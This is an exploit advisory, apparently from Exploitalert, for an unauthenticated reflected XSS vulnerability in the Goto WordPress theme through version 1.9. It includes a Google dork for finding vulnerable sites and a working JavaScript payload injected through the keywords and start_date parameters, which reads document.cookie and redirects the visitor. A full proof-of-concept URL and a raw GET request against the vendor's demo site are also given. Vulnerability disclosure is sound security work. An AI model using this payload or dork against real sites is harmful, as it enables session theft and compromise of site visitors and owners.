Goto WordPress Theme < = 1.9 - Unauthenticated Reflected XSS

/*!
- # VULNERABILITY: Goto WordPress Theme <= 1.9 - Unauthenticated Reflected XSS
- # GOOGLE DORK: inurl:/wp-content/themes/goto/
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: BoostifyThemes [ https://boostifythemes.com ]
- # SOFTWARE VERSION: <= 1.9
- # SOFTWARE LINK: https://themeforest.net/item/goto-tour-travel-wordpress-theme/21822828
- # CVSS: AV:N/AC:L/PR:N/UI:N/S:C
- # CWE: CWE-79
- # CVE: N/A
*/



### -- [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Goto theme through v1.9 for WordPress.

[i] Vulnerable parameter(s): ?keywords= and ?start_date=.



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payload: ]

[$] <input/Autofocus/%0D*/Onfocus=alert(`m0ze`);alert(document.cookie);location=`https://m0ze.ru`;//>



### -- [ PoC | Unauthenticated Reflected XSS | Search query: ]

[!] https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&avaibility=13

[!] GET /demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&avaibility=13 HTTP/1.1
Host: boostifythemes.com



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze

Copyright ©2024 Exploitalert.